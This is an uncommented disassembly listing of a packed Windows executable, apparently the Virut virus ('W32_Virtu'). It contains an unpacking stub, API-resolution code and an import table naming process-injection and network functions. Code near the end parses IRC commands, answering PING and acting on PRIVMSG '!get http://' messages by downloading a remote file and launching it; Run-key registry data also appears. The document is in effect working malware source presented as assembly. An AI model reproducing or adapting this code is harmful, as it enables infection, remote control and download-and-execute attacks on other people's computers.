dd 7269A619h, 73764DBFh, 41797466h, 68216F36h, 33706C65h
dd 0DBEE60B5h, 709D5332h, 506F6873h, 1C2B1267h, 789A158h
dd 6F594E0Fh, 0C2C20B36h, 4586733Dh, 82B5ACD4h, 1508554Bh
dd 6DB7C20Fh, 0ED00F152h, 2E68250Ch, 7D6567h, 43930167h
dd 0A7E432E9h, 512CDB6Ch, 15791175h, 72617453h, 4B377B74h
dd 700F5116h, 69676552h, 31B671CAh, 233672ACh, 85728B6Ch
dd 399B05DDh, 75744417h, 50134C73h, 442BBE82h, 21651E80h
dd 7F2E3D9Bh, 86FC9330h, 0BF417604h, 6A644141h, 31747375h
dd 62A34059h, 46127377h, 53DF9E02h, 6872DF43h, 5961D86Ch
dd 0BA0E3FD0h, 0D9B2DCFEh, 10E32133h, 9079654Bh, 823DEC5Ch
dd 3D0F330Eh, 9623DB92h, 7581C779h, 61E69F70h, 75325663h
dd 4950FA7Ch, 12F66963h
dd 0B3706DC2h, 46389410h, 0F37B5B0h, 9D451B7Ch, 0B72CF1CDh
dd 0F0010337h, 68057265h, 5FF4E19Dh, 8E706358h, 5F5F0C72h
dd 8B476EB5h, 6772C80Ah, 0CE085FE9h, 22AEB42Dh, 70A6D18h
dd 0FB070272h, 72B9BFFEh, 3F3F0664h, 41594032h, 49584150h
dd 70365A40h, 0B6F68602h, 76652C58h, 116B8B0Eh, 3773433Eh
dd 61578882h, 6082364Ah, 64665FEDh, 6D392EC4h, 95C15A36h
dd 0D9AF9D44h, 0CC1B66E6h, 1262C510h, 0BD1D661Fh, 4B362DB7h
dd 7411703Eh, 770F7079h, 0B5A22EC6h, 13685FC7h, 0A3771133h
dd 39590215h, 1D7066E5h, 0BDD35CF6h, 58339DD3h, 2CB19D9Eh
dd 476D5C18h, 0E00086Dh, 0D9BC1598h, 5255319Ch, 0E99F444Ch
dd 6A518374h, 481C19D2h, 9B5B390h, 170AE0C1h, 0B6596524h
dd 17FF504Dh, 0C390402h, 96596596h, 10131534h, 96590903h
dd 74025965h, 0F208010Dh, 73659604h, 50710B0Eh, 92FE8045h
dd 3014CFFh, 8200800h, 0B010F9Ah, 41660601h, 4052C6CFh
dd 0BE2FCC13h, 0F7D9E764h, 0F10040Fh, 5B070004h, 17B67406h
dd 0CB0C3180h, 10EC0DE0h, 0BA360607h, 0B4CB2101h, 0A4A2A041h
dd 8C2B829h, 85F02E26h, 79DB06Ch, 3090213Ah, 8F052D98h
dd 2E609501h, 29611072h, 53B9309Bh, 6A0309B0h, 0DEECD3BDh
dd 3C262E40h, 75026C8h, 94E1B6E5h, 0EB00C027h, 5E0343F8h
dd 75h, 4800000h, 0FF00h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_407000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_409082
; ---------------------------------------------------------------------------
align 8
loc_409078: ; CODE XREF: seg001:loc_409089�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40907E: ; CODE XREF: seg001:00409116�j
; seg001:0040912D�j
add ebx, ebx
jnz short loc_409089
loc_409082: ; CODE XREF: seg001:00409070�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_409089: ; CODE XREF: seg001:00409080�j
jb short loc_409078
mov eax, 1
loc_409090: ; CODE XREF: seg001:0040909F�j
; seg001:004090AA�j
add ebx, ebx
jnz short loc_40909B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40909B: ; CODE XREF: seg001:00409092�j
adc eax, eax
add ebx, ebx
jnb short loc_409090
jnz short loc_4090AC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_409090
loc_4090AC: ; CODE XREF: seg001:004090A1�j
xor ecx, ecx
sub eax, 3
jb short loc_4090C0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_409132
mov ebp, eax
loc_4090C0: ; CODE XREF: seg001:004090B1�j
add ebx, ebx
jnz short loc_4090CB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090CB: ; CODE XREF: seg001:004090C2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4090D8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090D8: ; CODE XREF: seg001:004090CF�j
adc ecx, ecx
jnz short loc_4090FC
inc ecx
loc_4090DD: ; CODE XREF: seg001:004090EC�j
; seg001:004090F7�j
add ebx, ebx
jnz short loc_4090E8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090E8: ; CODE XREF: seg001:004090DF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4090DD
jnz short loc_4090F9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4090DD
loc_4090F9: ; CODE XREF: seg001:004090EE�j
add ecx, 2
loc_4090FC: ; CODE XREF: seg001:004090DA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40911C
loc_40910D: ; CODE XREF: seg001:00409114�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40910D
jmp loc_40907E
; ---------------------------------------------------------------------------
align 4
loc_40911C: ; CODE XREF: seg001:0040910B�j
; seg001:00409129�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40911C
add edi, ecx
jmp loc_40907E
; ---------------------------------------------------------------------------
loc_409132: ; CODE XREF: seg001:004090BC�j
pop esi
mov edi, esi
mov ecx, 5Dh
loc_40913A: ; CODE XREF: seg001:00409141�j
; seg001:00409146�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40913F: ; CODE XREF: seg001:00409164�j
cmp al, 1
ja short loc_40913A
cmp byte ptr [edi], 1
jnz short loc_40913A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_40913F
lea edi, [esi+7000h]
loc_40916C: ; CODE XREF: seg001:0040918E�j
mov eax, [edi]
or eax, eax
jz short loc_4091B7
mov ebx, [edi+4]
lea eax, [eax+esi+9000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+90A0h]
xchg eax, ebp
loc_409189: ; CODE XREF: seg001:004091AF�j
mov al, [edi]
inc edi
or al, al
jz short loc_40916C
mov ecx, edi
jns short near ptr loc_40919A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40919A: ; CODE XREF: seg001:00409192�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+90A4h]
or eax, eax
jz short loc_4091B1
mov [ebx], eax
add ebx, 4
jmp short loc_409189
; ---------------------------------------------------------------------------
loc_4091B1: ; CODE XREF: seg001:004091A8�j
call dword ptr [esi+90A8h]
loc_4091B7: ; CODE XREF: seg001:00409170�j
popa
jmp loc_402FCC
; ---------------------------------------------------------------------------
align 1000h
seg001 ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00014000 ( 81920.)
; Section size in file : 0000F600 ( 62976.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg002 segment para public 'CODE' use32
assume cs:seg002
;org 40A000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 3 dup(0)
dd 0A0E0h, 0A0A0h, 3 dup(0)
dd 0A0EDh, 0A0B0h, 3 dup(0)
dd 0A0FAh, 0A0B8h, 3 dup(0)
dd 0A103h, 0A0C0h, 3 dup(0)
dd 0A10Eh, 0A0C8h, 3 dup(0)
dd 0A119h, 0A0D0h, 3 dup(0)
dd 0A124h, 0A0D8h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 76D64B79h, 0
dd 77C39E7Eh, 0
dd 42D779A3h, 0
dd 7E45A045h, 0
dd 71AB2BF4h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 4349006Ch, 642E504Dh, 4D006C6Ch, 52435653h
dd 6C642E54h, 7275006Ch, 6E6F6D6Ch, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 5F325357h, 642E3233h, 6C6Ch, 64616F4Ch
dd 7262694Ch, 41797261h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 78450000h, 72507469h, 7365636Fh, 73h, 43676552h
dd 65736F6Ch, 79654Bh, 63490000h, 6553706Dh, 6345646Eh
dd 6F68h, 74697865h, 52550000h, 776F444Ch, 616F6C6Eh, 466F5464h
dd 41656C69h, 78450000h, 69577469h, 776F646Eh, 784573h
dd 18h dup(0)
; ---------------------------------------------------------------------------
call $+5
push ebp
mov ebx, [esp+8]
mov ebp, [esp+4]
sub dword ptr [esp+4], 11A5h
and ebx, 0FFFFF000h
sub ebp, 401005h
loc_40A222: ; CODE XREF: seg002:0040A23D�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_40A237
mov eax, [ebx+3Ch]
add eax, ebx
cmp word ptr [eax], 4550h
jz short loc_40A23F
loc_40A237: ; CODE XREF: seg002:0040A229�j
sub ebx, 100h
jmp short loc_40A222
; ---------------------------------------------------------------------------
loc_40A23F: ; CODE XREF: seg002:0040A235�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_40A24D: ; CODE XREF: seg002:loc_40A274�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_40A274
cmp dword ptr [eax+3], 636F7250h
jnz short loc_40A274
cmp dword ptr [eax+7], 72646441h
jnz short loc_40A274
cmp dword ptr [eax+0Bh], 737365h
jz short loc_40A279
loc_40A274: ; CODE XREF: seg002:0040A257�j
; seg002:0040A260�j ...
loop loc_40A24D
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40A279: ; CODE XREF: seg002:0040A272�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_40A29F+2
inc ebx
insb
outsd
jnb short near ptr loc_40A2FD+2
dec eax
popa
outsb
db 64h
insb
loc_40A29F: ; CODE XREF: seg002:0040A290�p
add gs:[ebx-1], dl
setalc
mov [ebp+402407h], eax
call near ptr loc_40A2BB+1
inc ebx
jb short loc_40A317
popa
jz short loc_40A31A
inc ebp
jbe short near ptr loc_40A31C+1
outsb
jz short near ptr loc_40A2FA+2
loc_40A2BB: ; CODE XREF: seg002:0040A2AA�p
add [ebx-1], dl
setalc
mov [ebp+40240Bh], eax
call sub_40A2D7
inc edi
db 65h
jz short loc_40A31A
popa
jnb short sub_40A345
inc ebp
jb short near ptr sub_40A345+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_40A2D7 proc near ; CODE XREF: seg002:0040A2C5�p
; FUNCTION CHUNK AT 0040A355 SIZE 0000008D BYTES
; FUNCTION CHUNK AT 0040A471 SIZE 000000DD BYTES
push ebx
call esi ; CloseServiceHandle
mov dword ptr ss:loc_40240F[ebp], eax
call sub_40A32A
test eax, eax
jz short loc_40A30A
push eax
call dword ptr ss:loc_40240F[ebp]
test eax, eax
jnz short loc_40A304
lea eax, loc_401155[ebp]
loc_40A2FA: ; CODE XREF: seg002:0040A2B9�j
mov dl, [eax-1]
loc_40A2FD: ; CODE XREF: seg002:0040A298�j
call sub_40A345
jmp short loc_40A355
; ---------------------------------------------------------------------------
loc_40A304: ; CODE XREF: sub_40A2D7+1B�j
; sub_40A2D7+E7�j ...
call dword ptr [ebp+402407h]
loc_40A30A: ; CODE XREF: sub_40A2D7+10�j
pop ebp
retn
sub_40A2D7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_40A30C: ; CODE XREF: sub_40A32A+2�p
; sub_40A2D7:loc_40A4E1�p
pop edx
push 0
push 0
push 0
push 0
; ---------------------------------------------------------------------------
db 68h, 1
; ---------------------------------------------------------------------------
loc_40A317: ; CODE XREF: seg002:0040A2B0�j
add [eax+eax], al
loc_40A31A: ; CODE XREF: seg002:0040A2B3�j
; seg002:0040A2CB�j
mov eax, esp
loc_40A31C: ; CODE XREF: seg002:0040A2B6�j
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
push esi
push esp
pop edi
xor eax, [eax]
; =============== S U B R O U T I N E =======================================
sub_40A32A proc near ; CODE XREF: sub_40A2D7+9�p
; seg002:loc_40AEDC�p
xor ecx, ecx
call loc_40A30C
lea edx, loc_401125[ebp]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+40240Bh]
add esp, 20h
retn
sub_40A32A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A345 proc near ; CODE XREF: seg002:0040A2CF�j
; sub_40A2D7:loc_40A2FD�p ...
mov dh, dl
mov ecx, 12B2h
loc_40A34C: ; CODE XREF: sub_40A345+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_40A34C
retn
sub_40A345 endp
; ---------------------------------------------------------------------------
db 0ECh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A2D7
loc_40A355: ; CODE XREF: sub_40A2D7+2B�j
and dword ptr ss:loc_401480[ebp], 0
and dword ptr ss:loc_401484[ebp], 0
and dword ptr ss:loc_401488[ebp], 0
push edi
mov byte ptr ss:loc_401262[ebp], 1
mov [ebp+402413h], esi
lea esi, [ebp+4014A9h]
xor ecx, ecx
lea edi, loc_402423[ebp]
mov cl, 1Ch
call sub_40A68C
pop edi
call dword ptr [ebp+40245Bh]
shr eax, 1Fh
jz loc_40A471
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+40241Bh], eax
push 5839h
push 0
call dword ptr ss:loc_40248B[ebp]
test eax, eax
jz loc_40A304
xchg eax, edi
lea esi, sub_401000[ebp]
mov ebp, edi
mov ecx, 60Fh
sub ebp, offset sub_401000
lea edx, [ebp+4011E2h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_40A2D7
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+4018D1h]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+40241Bh]
add esp, 20h
test eax, eax
jz loc_40A304
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+40241Bh]
test eax, eax
jz loc_40A304
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+40241Bh]
push 1000Ah
call dword ptr [ebp+40241Bh]
call sub_40A461
jmp loc_40A304
; =============== S U B R O U T I N E =======================================
sub_40A461 proc near ; CODE XREF: seg002:0040A457�p
; sub_40A461+D�j
push 1
pop ecx
jecxz short locret_40A470
push 0Ah
call dword ptr ss:loc_402483[ebp]
jmp short sub_40A461
; ---------------------------------------------------------------------------
locret_40A470: ; CODE XREF: sub_40A461+3�j
retn
sub_40A461 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A2D7
loc_40A471: ; CODE XREF: sub_40A2D7+C0�j
cmp dword ptr [ebp+40243Bh], 0
jz loc_40A304
call near ptr loc_40A488+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_40A488: ; CODE XREF: sub_40A2D7+1A7�p
add bh, bh
xchg eax, ebp
dec edi
and al, 40h
add [ebp+401637B5h], cl
add [ebx], dh
leave
lea edi, [ebp+402493h]
mov cl, 9
xchg eax, ebx
call sub_40A68C
cmp dword ptr [ebp+4024B3h], 0
jz loc_40A304
mov eax, dword ptr ss:loc_402497[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+4023C1h]
mov eax, dword ptr ss:loc_40249B[ebp]
push dword ptr [eax+1]
pop dword ptr ss:loc_4023C7[ebp]
mov ecx, [ebp+40249Fh]
jecxz short loc_40A4E1
push dword ptr [ecx+1]
pop dword ptr ss:locret_4023D4[ebp]
loc_40A4E1: ; CODE XREF: sub_40A2D7+1FF�j
call loc_40A30C
lea edx, [ebp+40149Fh]
push edx
push 5839h
push 0
push 4
push eax
push 0FFFFFFFFh
call dword ptr [ebp+40242Bh]
add esp, 20h
push 5839h
mov edx, esp
push 0
mov ecx, esp
push 4
push 0
push 2
push edx
push 0
push 5839h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr ss:loc_4024A3[ebp]
pop edi
pop ecx
test edi, edi
jz loc_40A304
lea esi, sub_401000[ebp]
mov ecx, 60Fh
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, [ebp+40134Eh]
jmp eax
; END OF FUNCTION CHUNK FOR sub_40A2D7
; ---------------------------------------------------------------------------
dw 958Dh
dd offset loc_401788+1
dd 6395FF52h, 0E8004024h, 16h
aLookupprivileg db 'LookupPrivilegeValueA',0
dw 0FF50h
dd 40241395h, 17858900h, 50004024h, 6A206A54h, 0A795FFFFh
dd 85004024h, 3F755FC0h, 56026A96h, 6AD48B56h, 11E85201h
dd 53000000h, 62654465h, 72506775h, 6C697669h, 656765h
dd 1795FF56h, 8B004024h, 565656C4h, 0FF575650h, 40249395h
dd 10C48300h, 795FF57h, 6A004024h, 0FF026A00h, 40243B95h
dd 128B900h, 2B970000h, 240C89E1h, 95FF5754h, 402473h
dd 0A583F633h, 4024F7h, 0FF575400h, 40247795h, 74C08500h
dd 0FE83465Ch, 0FFEE7204h, 6A082474h, 0FF2A6A00h, 40246F95h
dd 74C08500h, 0E4E893DCh, 33000003h, 30E391C9h, 24F78539h
dd 28750040h, 0C3EC181h, 54500000h, 50515650h, 95FF5350h
dd 402433h, 7459C085h, 2474FF0Fh, 0F7858F08h, 0E8004024h
dd 0FFFFFE09h, 795FF53h, 0EB004024h, 28C48198h, 57000001h
dd 240795FFh, 91E90040h, 90FFFFFCh, 585858h, 1839h, 0BF4h
dd 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_40A68C proc near ; CODE XREF: sub_40A2D7+B1�p
; sub_40A2D7+1C9�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+402413h]
stosd
pop ecx
loc_40A697: ; CODE XREF: sub_40A68C+E�j
lodsb
test al, al
jnz short loc_40A697
loop sub_40A68C
retn
sub_40A68C endp
; ---------------------------------------------------------------------------
aW32_virtu db 'W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_40A9D0 proc near ; CODE XREF: seg002:0040AA73�p
; seg002:0040AA84�p ...
var_6 = byte ptr -6
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+3]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4024ABh]
add esp, 0Ch
call dword ptr ss:loc_4024AF[ebp]
add esp, 8
retn
sub_40A9D0 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+40149Fh]
xor edi, edi
push eax
push 0
push 6
call dword ptr [ebp+40246Bh]
test eax, eax
jz short loc_40AA9E
push eax
push 5839h
mov edx, esp
push 0
mov ecx, esp
push 4
push 100000h
push 2
push edx
push 0
push 5839h
push 0
push ecx
push ebx
push eax
call dword ptr ss:loc_4024A3[ebp]
pop edi
pop ecx
call dword ptr [ebp+402407h]
test edi, edi
jz short loc_40AA9E
mov ecx, dword ptr ss:loc_401488[ebp]
jecxz short loc_40AA67
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_40AA67: ; CODE XREF: seg002:0040AA59�j
mov eax, dword ptr ss:loc_402497[ebp]
lea ecx, [edi+1379h]
call sub_40A9D0
mov eax, dword ptr ss:loc_40249B[ebp]
lea ecx, [edi+13C6h]
call sub_40A9D0
mov eax, [ebp+40249Fh]
test eax, eax
jz short loc_40AA9E
lea ecx, [edi+13D3h]
call sub_40A9D0
loc_40AA9E: ; CODE XREF: seg002:0040AA1D�j
; seg002:0040AA51�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 4018A8h
xor ecx, ecx
lea eax, loc_401C3E[ebp]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+402437h]
xchg eax, [esp]
call dword ptr [ebp+402407h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 18D7ED81h, 0FF6A0040h, 18A2958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 4018E8h, 85C720CDh
dd 4018EAh, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1906B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 24AB95FFh, 0C4830040h, 3F958B0Ch, 2B004024h, 7EA83D7h
dd 6A07C7h, 578900E8h, 9569C303h, 402501h, 8088405h, 0B042C033h
dd 195891Ah, 0F7004025h, 61428DE2h, 75C9FEAAh, 0E855C3E1h
dd 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401998h
mov ebx, dword ptr ss:loc_402505[ebp]
cmp dword ptr [esp+8], 0
jz loc_40AC69
sub esp, 208h
push esp
push 104h
call dword ptr [ebp+402457h]
mov edi, esp
lea eax, [esp+104h]
push eax
push 0
call near ptr loc_40ABD6+1
push esi
push edx
push esp
loc_40ABD6: ; CODE XREF: seg002:0040ABCE�p
add [edi-1], dl
xchg eax, ebp
push ebx
and al, 40h
add [ebx], dh
leave
lea edx, [edi+104h]
push ecx
push ecx
push 2
push ecx
push 1
push 40000000h
push edx
call dword ptr ss:loc_402427[ebp]
xchg eax, esi
test esi, esi
jz short loc_40AC59
loc_40ABFE: ; CODE XREF: seg002:0040AC2C�j
push eax
push esp
push 104h
push edi
push dword ptr [esp+220h]
call dword ptr ss:loc_4024E3[ebp]
pop ecx
test eax, eax
jz short loc_40AC2E
jecxz short loc_40AC2E
push eax
mov edx, esp
push 0
push edx
push ecx
push edi
push esi
call dword ptr ss:loc_40248F[ebp]
pop ecx
test eax, eax
jnz short loc_40ABFE
loc_40AC2E: ; CODE XREF: seg002:0040AC16�j
; seg002:0040AC18�j
push esi
call dword ptr [ebp+402407h]
lea edx, [edi+44h]
push edx
push edi
push 44h
pop eax
lea edx, [edi+104h]
stosd
xor eax, eax
push 10h
pop ecx
rep stosd
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push edx
call dword ptr [ebp+40242Fh]
loc_40AC59: ; CODE XREF: seg002:0040ABFC�j
add esp, 208h
push dword ptr [esp+8]
call dword ptr [ebp+4024D3h]
loc_40AC69: ; CODE XREF: seg002:0040ABAA�j
push ebx
call dword ptr [ebp+4024D3h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
cmp byte ptr [esi], 0Ah
jnz short loc_40AC7A
inc esi
loc_40AC7A: ; CODE XREF: seg002:0040AC77�j
mov ecx, dword ptr ss:loc_401484[ebp]
jecxz short loc_40AC9B
lea edx, sub_401000[ebp]
add edx, ecx
push esi
call edx
test al, al
js loc_40ADB4
jz loc_40ADAB
loc_40AC9B: ; CODE XREF: seg002:0040AC80�j
cmp byte ptr [esi], 3Ah
jnz short loc_40ACB0
loc_40ACA0: ; CODE XREF: seg002:0040ACAD�j
inc esi
cmp byte ptr [esi], 0
jz loc_40ADAB
cmp byte ptr [esi], 20h
jnz short loc_40ACA0
inc esi
loc_40ACB0: ; CODE XREF: seg002:0040AC9E�j
cmp dword ptr [esi], 474E4950h
jnz short loc_40ACFA
mov ecx, edi
mov byte ptr [esi+1], 4Fh
sub ecx, esi
push ecx
push 0
push ecx
push esi
push ebx
call dword ptr [ebp+4024CBh]
pop ecx
cmp eax, ecx
jnz loc_40ADB4
lea eax, loc_401C32[ebp]
push 0
push 0Ch
push eax
push ebx
call dword ptr [ebp+4024CBh]
cmp eax, 0Ch
jnz loc_40ADB4
jmp loc_40ADAB
; ---------------------------------------------------------------------------
loc_40ACFA: ; CODE XREF: seg002:0040ACB6�j
cmp dword ptr [esi], 56495250h
jnz loc_40ADAB
add esi, 8
loc_40AD09: ; CODE XREF: seg002:0040AD14�j
lodsb
cmp al, 0Dh
jz loc_40ADAB
cmp al, 20h
jnz short loc_40AD09
lodsb
cmp al, 3Ah
jnz loc_40ADAB
lodsd
or eax, 20202020h
cmp eax, 74656721h
jnz short loc_40ADAB
lodsb
cmp al, 20h
jnz short loc_40ADAD
cmp dword ptr [esi-1], 74746820h
jnz short loc_40ADAB
cmp dword ptr [esi+3], 2F2F3A70h
jnz short loc_40ADAB
mov byte ptr [edi-1], 0
rdtsc
mov edx, 2710h
mul edx
push edx
call dword ptr ss:loc_402483[ebp]
xor eax, eax
push eax
push eax
push eax
push eax
call near ptr loc_40AD69+2
inc esp
outsd
ja short loc_40ADD4
insb
outsd
popa
loc_40AD69: ; CODE XREF: seg002:0040AD5D�p
db 64h
add bh, bh
xchg eax, ebp
; ---------------------------------------------------------------------------
dd offset loc_4024DA+1
; ---------------------------------------------------------------------------
test eax, eax
jz short loc_40ADAB
xor ecx, ecx
mov dword ptr ss:loc_402505[ebp], eax
push ecx
push 80000200h
push ecx
push ecx
push esi
push eax
call dword ptr [ebp+4024DFh]
lea edx, [ebp+401992h]
push eax
xor ecx, ecx
push esp
push ecx
push eax
push edx
push ecx
push ecx
call dword ptr [ebp+402437h]
xchg eax, [esp]
call dword ptr [ebp+402407h]
loc_40ADAB: ; CODE XREF: seg002:0040AC95�j
; seg002:0040ACA4�j ...
clc
retn
; ---------------------------------------------------------------------------
loc_40ADAD: ; CODE XREF: seg002:0040AD2F�j
or byte ptr [ebp+401477h], 1
loc_40ADB4: ; CODE XREF: seg002:0040AC8F�j
; seg002:0040ACCF�j ...
stc
retn
; ---------------------------------------------------------------------------
dw 4F53h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch
; ---------------------------------------------------------------------------
loc_40ADD4: ; CODE XREF: seg002:0040AD64�j
jb short near ptr loc_40AE3A+1
outsb
jz short loc_40AE2F
db 65h
jb short near ptr loc_40AE4B+4
imul ebp, [edi+6Eh], 7078455Ch
insb
outsd
jb short near ptr loc_40AE4B+1
jb short $+2
push ebp
outsb
imul esi, [ecx+75h], 736F4865h
jz short $+2
add al, [eax]
push eax
jg short $+2
add [ecx], al
jo short loc_40AE70
outsd
js short near ptr loc_40AE69+1
insd
popa
imul esi, cs:[edx+63h], 616C6167h
js short near ptr loc_40AE85+1
db 2Eh
jo short loc_40AE7C
add [esi+49h], cl
inc ebx
dec ebx
and [ebx+6Bh], ch
jns short near ptr loc_40AE7F+1
jno short loc_40AE8C
jno short near ptr loc_40AE85+2
or dl, [ebp+53h]
inc ebp
push edx
and [ecx+30h], ch
xor dh, [eax]
xor eax, 2E203130h
and [esi], ch
